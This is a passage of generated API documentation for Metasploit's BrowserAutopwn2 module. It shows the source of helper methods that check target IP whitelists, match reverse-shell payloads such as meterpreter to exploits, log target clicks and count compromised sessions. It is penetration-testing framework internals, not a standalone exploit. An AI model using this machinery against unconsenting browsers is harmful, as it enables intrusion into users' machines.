<span class='id identifier rubyid_mod'>mod</span> <span class='op'>=</span> <span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_exploits'>exploits</span><span class='period'>.</span><span class='id identifier rubyid_create'>create</span><span class='lparen'>(</span><span class='id identifier rubyid_fullname'>fullname</span><span class='rparen'>)</span>
<span class='kw'>unless</span> <span class='id identifier rubyid_mod'>mod</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Failed to load: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_fullname'>fullname</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>next</span>
<span class='kw'>end</span>
<span class='kw'>if</span> <span class='id identifier rubyid_mod'>mod</span><span class='period'>.</span><span class='id identifier rubyid_kind_of?'>kind_of?</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="BrowserExploitServer.html" title="Msf::Exploit::Remote::BrowserExploitServer (module)">BrowserExploitServer</a></span></span><span class='rparen'>)</span>
<span class='ivar'>@bap_exploits</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_mod'>mod</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="is_ip_targeted?-instance_method">
#<strong>is_ip_targeted?</strong>(cli_ip) &#x21d2; <tt>TrueClass</tt>, <tt>FalseClass</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns true if the IP is on our whitelist.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cli_ip</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>Clients IP.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>TrueClass</tt>)</span>
&mdash;
<div class='inline'>
<p>The IP is on the whitelist.</p>
</div>
</li>
<li>
<span class='type'>(<tt>FalseClass</tt>)</span>
&mdash;
<div class='inline'>
<p>The IP is not on the whitelist.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
707
708
709
710</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 707</span>
<span class='kw'>def</span> <span class='id identifier rubyid_is_ip_targeted?'>is_ip_targeted?</span><span class='lparen'>(</span><span class='id identifier rubyid_cli_ip'>cli_ip</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>true</span> <span class='kw'>unless</span> <span class='ivar'>@whitelist</span>
<span class='ivar'>@whitelist</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='id identifier rubyid_cli_ip'>cli_ip</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="is_multi_platform_exploit?-instance_method">
#<strong>is_multi_platform_exploit?</strong>(m) &#x21d2; <tt>TrueClass</tt>, <tt>FalseClass</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Checks if the module is multi-platform based on the directory path.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>m</span>
<span class='type'>(<tt>Object</tt>)</span>
&mdash;
<div class='inline'>
<p>Module.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>TrueClass</tt>)</span>
&mdash;
<div class='inline'>
<p>is multi-platform.</p>
</div>
</li>
<li>
<span class='type'>(<tt>FalseClass</tt>)</span>
&mdash;
<div class='inline'>
<p>is not multi-platform.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
402
403
404</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 402</span>
<span class='kw'>def</span> <span class='id identifier rubyid_is_multi_platform_exploit?'>is_multi_platform_exploit?</span><span class='lparen'>(</span><span class='id identifier rubyid_m'>m</span><span class='rparen'>)</span>
<span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_fullname'>fullname</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>multi/</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="is_payload_compatible?-instance_method">
#<strong>is_payload_compatible?</strong>(compatible_payloads, payload_name) &#x21d2; <tt>TrueClass</tt>, <tt>FalseClass</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Checks whether the payload is compatible with the module based on the modules compatibility list</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>compatible_payloads</span>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>A list of payloads that are compatible</p>
</div>
</li>
<li>
<span class='name'>payload_name</span>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>TrueClass</tt>)</span>
&mdash;
<div class='inline'>
<p>Payload is compatible.</p>
</div>
</li>
<li>
<span class='type'>(<tt>FalseClass</tt>)</span>
&mdash;
<div class='inline'>
<p>Payload is not compatible.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
388
389
390
391
392
393
394</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 388</span>
<span class='kw'>def</span> <span class='id identifier rubyid_is_payload_compatible?'>is_payload_compatible?</span><span class='lparen'>(</span><span class='id identifier rubyid_compatible_payloads'>compatible_payloads</span><span class='comma'>,</span> <span class='id identifier rubyid_payload_name'>payload_name</span><span class='rparen'>)</span>
<span class='id identifier rubyid_compatible_payloads'>compatible_payloads</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_k'>k</span><span class='op'>|</span>
<span class='kw'>return</span> <span class='kw'>true</span> <span class='kw'>if</span> <span class='id identifier rubyid_k'>k</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span> <span class='op'>==</span> <span class='id identifier rubyid_payload_name'>payload_name</span>
<span class='kw'>end</span>
<span class='kw'>false</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="is_payload_platform_compatible?-instance_method">
#<strong>is_payload_platform_compatible?</strong>(m, payload_platform) &#x21d2; <tt>TrueClass</tt>, <tt>FalseClass</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Checks whether the payload is compatible with the module based on platform information. Best for single-platform modules and for performance.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>m</span>
<span class='type'>(<tt>Object</tt>)</span>
&mdash;
<div class='inline'>
<p>Module.</p>
</div>
</li>
<li>
<span class='name'>payload_platform</span>
<span class='type'>(<tt>Symbol</tt>)</span>
&mdash;
<div class='inline'>
<p>Payload platform.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>TrueClass</tt>)</span>
&mdash;
<div class='inline'>
<p>Payload is compatible.</p>
</div>
</li>
<li>
<span class='type'>(<tt>FalseClass</tt>)</span>
&mdash;
<div class='inline'>
<p>Payload is not compatible.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
369
370
371
372
373
374
375
376
377
378
379</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 369</span>
<span class='kw'>def</span> <span class='id identifier rubyid_is_payload_platform_compatible?'>is_payload_platform_compatible?</span><span class='lparen'>(</span><span class='id identifier rubyid_m'>m</span><span class='comma'>,</span> <span class='id identifier rubyid_payload_platform'>payload_platform</span><span class='rparen'>)</span>
<span class='kw'>begin</span>
<span class='id identifier rubyid_platform_obj'>platform_obj</span> <span class='op'>=</span> <span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Module/Platform.html" title="Msf::Module::Platform (class)">Platform</a></span></span><span class='period'>.</span><span class='id identifier rubyid_find_platform'><span class='object_link'><a href="../../Module/Platform.html#find_platform-class_method" title="Msf::Module::Platform.find_platform (method)">find_platform</a></span></span><span class='lparen'>(</span><span class='id identifier rubyid_payload_platform'>payload_platform</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rparen'>)</span>
<span class='kw'>rescue</span> <span class='const'>ArgumentError</span>
<span class='kw'>false</span>
<span class='kw'>end</span>
<span class='kw'>return</span> <span class='kw'>true</span> <span class='kw'>if</span> <span class='id identifier rubyid_platform_obj'>platform_obj</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_platform'>platform</span><span class='period'>.</span><span class='id identifier rubyid_platforms'>platforms</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='id identifier rubyid_platform_obj'>platform_obj</span><span class='rparen'>)</span>
<span class='kw'>false</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="is_resource_taken?-instance_method">
#<strong>is_resource_taken?</strong>(resource) &#x21d2; <tt>TrueClass</tt>, <tt>FalseClass</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Checks if a resource is already taken or not.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>resource</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The resource to check.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>TrueClass</tt>)</span>
&mdash;
<div class='inline'>
<p>Resource is taken.</p>
</div>
</li>
<li>
<span class='type'>(<tt>FalseClass</tt>)</span>
&mdash;
<div class='inline'>
<p>Resource is not taken.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
155
156
157
158
159
160
161
162
163
164
165
166</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 155</span>
<span class='kw'>def</span> <span class='id identifier rubyid_is_resource_taken?'>is_resource_taken?</span><span class='lparen'>(</span><span class='id identifier rubyid_resource'>resource</span><span class='rparen'>)</span>
<span class='id identifier rubyid_taken'>taken</span> <span class='op'>=</span> <span class='kw'>false</span>
<span class='id identifier rubyid_bap_exploits'>bap_exploits</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_m'>m</span><span class='op'>|</span>
<span class='comment'># Prevent partial matching of one resource within another
</span> <span class='kw'>next</span> <span class='kw'>unless</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>return</span> <span class='kw'>true</span> <span class='kw'>if</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_index'>index</span><span class='lparen'>(</span><span class='id identifier rubyid_resource'>resource</span><span class='rparen'>)</span>
<span class='kw'>return</span> <span class='kw'>true</span> <span class='kw'>if</span> <span class='id identifier rubyid_resource'>resource</span><span class='period'>.</span><span class='id identifier rubyid_index'>index</span><span class='lparen'>(</span><span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>URIPATH</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_taken'>taken</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="log_click-instance_method">
#<strong>log_click</strong>(ip, data = &#39;&#39;) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Logs a click that includes the suitable exploit list.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>ip</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The targets IP address.</p>
</div>
</li>
<li>
<span class='name'>data</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>&#39;&#39;</tt>)</em>
&mdash;
<div class='inline'>
<p>(Optional) CSV data that contains the exploit list.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
610
611
612
613
614
615
616</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 610</span>
<span class='kw'>def</span> <span class='id identifier rubyid_log_click'>log_click</span><span class='lparen'>(</span><span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span> <span class='id identifier rubyid_data'>data</span><span class='op'>=</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_report_note'>report_note</span><span class='lparen'>(</span>
<span class='symbol'>:host</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_ip'>ip</span><span class='comma'>,</span>
<span class='symbol'>:type</span> <span class='op'>=&gt;</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>bap.clicks</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span>
<span class='symbol'>:data</span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span> <span class='symbol'>:csv_data</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_data'>data</span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='symbol'>:update</span> <span class='op'>=&gt;</span> <span class='symbol'>:unique</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="on_request_uri-instance_method">
#<strong>on_request_uri</strong>(cli, request) &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Handles client requests specific for BAP.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>cli</span>
<span class='type'>(<tt>Socket</tt>)</span>
&mdash;
<div class='inline'>
<p>Socket for the browser</p>
</div>
</li>
<li>
<span class='name'>request</span>
<span class='type'>(<tt><span class='object_link'><a href="../../../Rex/Proto/Http/Request.html" title="Rex::Proto::Http::Request (class)">Rex::Proto::Http::Request</a></span></tt>)</span>
&mdash;
<div class='inline'>
<p>The HTTP request sent by the browser</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
688
689
690
691
692
693
694
695
696
697
698
699</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 688</span>
<span class='kw'>def</span> <span class='id identifier rubyid_on_request_uri'>on_request_uri</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='comma'>,</span> <span class='id identifier rubyid_request'>request</span><span class='rparen'>)</span>
<span class='comment'># Check if target is on our whitelist
</span> <span class='kw'>if</span> <span class='ivar'>@whitelist</span> <span class='op'>&amp;&amp;</span> <span class='op'>!</span><span class='id identifier rubyid_is_ip_targeted?'>is_ip_targeted?</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='rparen'>)</span>
<span class='id identifier rubyid_print_status'>print_status</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Client </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='embexpr_end'>}</span><span class='tstring_content'> is trying to connect but not on our whitelist.</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='id identifier rubyid_send_not_found'>send_not_found</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='rparen'>)</span>
<span class='kw'>return</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_log_click'>log_click</span><span class='lparen'>(</span><span class='id identifier rubyid_cli'>cli</span><span class='period'>.</span><span class='id identifier rubyid_peerhost'>peerhost</span><span class='rparen'>)</span>
<span class='kw'>super</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="parse_rank-instance_method">
#<strong>parse_rank</strong>(rank) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns the human-readable version of the rank.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>rank</span>
<span class='type'>(<tt>Integer</tt>)</span>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
357
358
359</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 357</span>
<span class='kw'>def</span> <span class='id identifier rubyid_parse_rank'>parse_rank</span><span class='lparen'>(</span><span class='id identifier rubyid_rank'>rank</span><span class='rparen'>)</span>
<span class='const'><span class='object_link'><a href="../../../Msf.html#RankingName-constant" title="Msf::RankingName (constant)">RankingName</a></span></span><span class='lbracket'>[</span><span class='id identifier rubyid_rank'>rank</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='period'>.</span><span class='id identifier rubyid_capitalize'>capitalize</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="rm_exploit_jobs-instance_method">
#<strong>rm_exploit_jobs</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Removes background exploit jobs that belong to BAP.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
86
87
88
89
90
91</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 86</span>
<span class='kw'>def</span> <span class='id identifier rubyid_rm_exploit_jobs'>rm_exploit_jobs</span>
<span class='id identifier rubyid_exploit_job_ids'>exploit_job_ids</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_id'>id</span><span class='op'>|</span>
<span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_jobs'>jobs</span><span class='period'>.</span><span class='id identifier rubyid_stop_job'>stop_job</span><span class='lparen'>(</span><span class='id identifier rubyid_id'>id</span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_jobs'>jobs</span><span class='lbracket'>[</span><span class='id identifier rubyid_id'>id</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_sleep'>sleep</span><span class='lparen'>(</span><span class='float'>0.1</span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="rm_payload_jobs-instance_method">
#<strong>rm_payload_jobs</strong> &#x21d2; <tt>void</tt>
</h3><div class="docstring">
<div class="discussion">
<p class="note returns_void">This method returns an undefined value.</p>
<p>Removes background payload jobs that belong to BAP.</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
97
98
99
100
101</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 97</span>
<span class='kw'>def</span> <span class='id identifier rubyid_rm_payload_jobs'>rm_payload_jobs</span>
<span class='id identifier rubyid_payload_job_ids'>payload_job_ids</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_id'>id</span><span class='op'>|</span>
<span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_jobs'>jobs</span><span class='period'>.</span><span class='id identifier rubyid_stop_job'>stop_job</span><span class='lparen'>(</span><span class='id identifier rubyid_id'>id</span><span class='rparen'>)</span> <span class='kw'>if</span> <span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_jobs'>jobs</span><span class='lbracket'>[</span><span class='id identifier rubyid_id'>id</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rbracket'>]</span>
<span class='kw'>end</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="select_payload-instance_method">
#<strong>select_payload</strong>(m) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns an appropriate payload thats compatible with the module.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>m</span>
<span class='type'>(<tt>Object</tt>)</span>
&mdash;
<div class='inline'>
<p>A module thats been initialized.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>Payload name. Example: windows/meterpreter/reverse_tcp</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 411</span>
<span class='kw'>def</span> <span class='id identifier rubyid_select_payload'>select_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_m'>m</span><span class='rparen'>)</span>
<span class='id identifier rubyid_compatible_payloads'>compatible_payloads</span> <span class='op'>=</span> <span class='lbracket'>[</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_module_payloads'>module_payloads</span> <span class='op'>=</span> <span class='kw'>nil</span>
<span class='const'><span class='object_link'><a href="#DEFAULT_PAYLOADS-constant" title="Msf::Exploit::Remote::BrowserAutopwn2::DEFAULT_PAYLOADS (constant)">DEFAULT_PAYLOADS</a></span></span><span class='period'>.</span><span class='id identifier rubyid_each_pair'>each_pair</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_platform'>platform</span><span class='comma'>,</span> <span class='id identifier rubyid_info'>info</span><span class='op'>|</span>
<span class='id identifier rubyid_payload_choice'>payload_choice</span> <span class='op'>=</span> <span class='lbrace'>{</span>
<span class='symbol'>:payload_name</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_get_selected_payload_name'>get_selected_payload_name</span><span class='lparen'>(</span><span class='id identifier rubyid_platform'>platform</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='symbol'>:payload_lport</span> <span class='op'>=&gt;</span> <span class='id identifier rubyid_get_selected_payload_lport'>get_selected_payload_lport</span><span class='lparen'>(</span><span class='id identifier rubyid_platform'>platform</span><span class='rparen'>)</span>
<span class='rbrace'>}</span>
<span class='kw'>if</span> <span class='op'>!</span><span class='id identifier rubyid_is_multi_platform_exploit?'>is_multi_platform_exploit?</span><span class='lparen'>(</span><span class='id identifier rubyid_m'>m</span><span class='rparen'>)</span> <span class='op'>&amp;&amp;</span> <span class='op'>!</span><span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_platform'>platform</span><span class='period'>.</span><span class='id identifier rubyid_platforms'>platforms</span><span class='period'>.</span><span class='id identifier rubyid_empty?'>empty?</span> <span class='op'>&amp;&amp;</span> <span class='id identifier rubyid_is_payload_platform_compatible?'>is_payload_platform_compatible?</span><span class='lparen'>(</span><span class='id identifier rubyid_m'>m</span><span class='comma'>,</span> <span class='id identifier rubyid_platform'>platform</span><span class='rparen'>)</span>
<span class='id identifier rubyid_compatible_payloads'>compatible_payloads</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_payload_choice'>payload_choice</span>
<span class='kw'>break</span>
<span class='kw'>else</span>
<span class='comment'># The #compatible_payloads method is super expensive (slow). By doing it this way,
</span> <span class='comment'># I managed to shave off seconds.
</span> <span class='id identifier rubyid_module_payloads'>module_payloads</span> <span class='op'>||=</span> <span class='id identifier rubyid_m'>m</span><span class='period'>.</span><span class='id identifier rubyid_compatible_payloads'>compatible_payloads</span>
<span class='kw'>if</span> <span class='id identifier rubyid_is_payload_compatible?'>is_payload_compatible?</span><span class='lparen'>(</span><span class='id identifier rubyid_module_payloads'>module_payloads</span><span class='comma'>,</span> <span class='id identifier rubyid_payload_choice'>payload_choice</span><span class='lbracket'>[</span><span class='symbol'>:payload_name</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_compatible_payloads'>compatible_payloads</span> <span class='op'>&lt;&lt;</span> <span class='id identifier rubyid_payload_choice'>payload_choice</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='ivar'>@wanted_payloads</span><span class='period'>.</span><span class='id identifier rubyid_concat'>concat</span><span class='lparen'>(</span><span class='id identifier rubyid_compatible_payloads'>compatible_payloads</span><span class='rparen'>)</span>
<span class='id identifier rubyid_compatible_payloads'>compatible_payloads</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="session_count-instance_method">
#<strong>session_count</strong> &#x21d2; <tt>Integer</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Returns a number of sessions obtained by BAPs payload handlers.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>A session count.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
716
717
718
719
720
721
722
723
724
725
726
727</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/browser_autopwn2.rb', line 716</span>
<span class='kw'>def</span> <span class='id identifier rubyid_session_count'>session_count</span>
<span class='id identifier rubyid_total'>total</span> <span class='op'>=</span> <span class='int'>0</span>
<span class='id identifier rubyid_payload_job_ids'>payload_job_ids</span><span class='period'>.</span><span class='id identifier rubyid_each'>each</span> <span class='kw'>do</span> <span class='op'>|</span><span class='id identifier rubyid_id'>id</span><span class='op'>|</span>
<span class='id identifier rubyid_job_workspace'>job_workspace</span> <span class='op'>=</span> <span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_jobs'>jobs</span><span class='lbracket'>[</span><span class='id identifier rubyid_id'>id</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_ctx'>ctx</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span><span class='period'>.</span><span class='id identifier rubyid_datastore'>datastore</span><span class='lbracket'>[</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>WORKSPACE</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_job_workspace'>job_workspace</span> <span class='op'>==</span> <span class='kw'>self</span><span class='period'>.</span><span class='id identifier rubyid_workspace'>workspace</span>
<span class='id identifier rubyid_total'>total</span> <span class='op'>+=</span> <span class='id identifier rubyid_framework'>framework</span><span class='period'>.</span><span class='id identifier rubyid_jobs'>jobs</span><span class='lbracket'>[</span><span class='id identifier rubyid_id'>id</span><span class='period'>.</span><span class='id identifier rubyid_to_s'>to_s</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_ctx'>ctx</span><span class='period'>.</span><span class='id identifier rubyid_first'>first</span><span class='period'>.</span><span class='id identifier rubyid_session_count'>session_count</span>
<span class='kw'>end</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_total'>total</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
